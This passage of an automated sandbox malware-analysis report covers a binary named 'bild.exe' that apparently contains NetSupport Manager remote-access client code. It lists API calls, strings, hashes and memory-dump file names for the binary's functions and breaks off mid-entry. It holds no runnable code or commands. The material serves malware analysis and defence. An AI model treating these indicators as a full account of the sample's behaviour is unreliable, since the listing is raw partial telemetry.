                                                                                                              • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                                              • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                                              • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                                              APIs
                                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                                              • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                                              • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoMoveParametersSystemTimerWindow
                                                                                                              • String ID: Max
                                                                                                              • API String ID: 1521622399-2772132969
                                                                                                              • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                                              • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                                              • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                                              • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                                              APIs
                                                                                                              • IsWindow.USER32(?), ref: 110ED118
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                                              • API String ID: 2577986331-1331251348
                                                                                                              • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                              • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                                              • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                                              • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 11081417
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                                              • API String ID: 2441568934-1875806619
                                                                                                              • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                              • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                                              • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                                              • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                                              • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                                              • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: EnumValue$CloseOpen
                                                                                                              • String ID:
                                                                                                              • API String ID: 3785232357-0
                                                                                                              • Opcode ID: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                                              • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                                              • Opcode Fuzzy Hash: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                                              • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                                              APIs
                                                                                                              • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                                              • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                                              • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                                              • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: SleepThread$CreateMessagePost
                                                                                                              • String ID:
                                                                                                              • API String ID: 3347742789-0
                                                                                                              • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                                              • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                                              • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                                              • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                                              APIs
                                                                                                              • EnterCriticalSection.KERNEL32(0000002C,E43C2CA5,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,E43C2CA5,?,?,00000000), ref: 110B336F
                                                                                                              • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,E43C2CA5,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                                              • SetEvent.KERNEL32(?,?,?,1103D571,?,E43C2CA5,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                                              • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,E43C2CA5,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalSection$Leave$EnterEvent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3394196147-0
                                                                                                              • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                                              • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                                              • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                                              • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                                              APIs
                                                                                                                • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                                                • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                                                • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                                              • CreateWindowExA.USER32(00000000,edit,00000000,40040004,?,?,?,?,?,00000002,00000000,?), ref: 110072F7
                                                                                                              • SetFocus.USER32(?), ref: 11007353
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CreateFocusWindow_malloc_memsetwsprintf
                                                                                                              • String ID: edit
                                                                                                              • API String ID: 1305092643-2167791130
                                                                                                              • Opcode ID: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                                              • Instruction ID: cb86e9af08271205595a6f41abc8b2cb286fac045a185d6d6013f354b30fec65
                                                                                                              • Opcode Fuzzy Hash: 9ab5e62bba32fe41a4b3d3dad999fb9395a40b928699cb569382db604b8d03bd
                                                                                                              • Instruction Fuzzy Hash: 8951B1B6A00606AFE741CF64CC80BABB7E5FB88354F15816DF955C7340EB34E9428B61
                                                                                                              APIs
                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 11009265
                                                                                                              • _memmove.LIBCMT ref: 110092B6
                                                                                                                • Part of subcall function 11008D50: std::_Xinvalid_argument.LIBCPMT ref: 11008D6A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                              • String ID: string too long
                                                                                                              • API String ID: 2168136238-2556327735
                                                                                                              • Opcode ID: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                                              • Instruction ID: 8571876bfdcccba51c928a6a288fcd5c1e124ad980ef247a8f71a2e078b75a0c
                                                                                                              • Opcode Fuzzy Hash: 1f1b424e40fb871dbeacd2805d2b31d3ae09b279eb3827a2ae8406d4573c0ed5
                                                                                                              • Instruction Fuzzy Hash: A731C732B14A104BF720DE9CE88095FF7EDEBE57A4B20061FE599C7640E7719C5083A1
                                                                                                              APIs
                                                                                                              • std::exception::exception.LIBCMT ref: 11041413
                                                                                                              • __CxxThrowException@8.LIBCMT ref: 11041421
                                                                                                              Strings
                                                                                                              • VolumeControl exception : %hs, xrefs: 11041431
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                                                              • String ID: VolumeControl exception : %hs
                                                                                                              • API String ID: 3728558374-910296547
                                                                                                              • Opcode ID: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                              • Instruction ID: 3351f46422f9e7833a0dd597507e069f064f33e0319a204fc915276dbd9183a5
                                                                                                              • Opcode Fuzzy Hash: 118abbde1ebe4424435f64918357d89c4207cb987e7db87aca0e3b34d3970159
                                                                                                              • Instruction Fuzzy Hash: A721E775F006059FCF01CF65C890BFEF7E8EB49609FA085A9E81697A40DB35B904CBA1
                                                                                                              APIs
                                                                                                                • Part of subcall function 11143C20: GetCurrentProcess.KERNEL32(1102947F,?,11143E73,?), ref: 11143C2C
                                                                                                                • Part of subcall function 11143C20: GetModuleFileNameA.KERNEL32(00000000,C:\Users\Public\Pictures\bild.exe,00000104,?,11143E73,?), ref: 11143C49
                                                                                                              • _memmove.LIBCMT ref: 11147211
                                                                                                              Strings
                                                                                                              • Failed to get callstack, xrefs: 111471BD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180389264.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180412265.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180435058.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_1_2_11000000_bild.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CurrentFileModuleNameProcess_memmove
                                                                                                              • String ID: Failed to get callstack
                                                                                                              • API String ID: 4135527288-766476014
                                                                                                              • Opcode ID: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                              • Instruction ID: 4fb2fbc616631b5574b6180649b942946bf04768c5170edb731833e4cde01d29
                                                                                                              • Opcode Fuzzy Hash: 63529710b4138f6f81ad4f3080514690bdb2b876b6fb0115b81c75db0389a908
                                                                                                              • Instruction Fuzzy Hash: D3219875A0011D9BCB14DF64DD94BAEB3B9EF8871CF1041AAEC0DA7240DB31AE54CB90
                                                                                                              APIs
                                                                                                              • wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                                                • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000001.00000002.4180214210.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                                              • Associated: 00000001.00000002.4180187919.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000001.00000002.4180349116.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
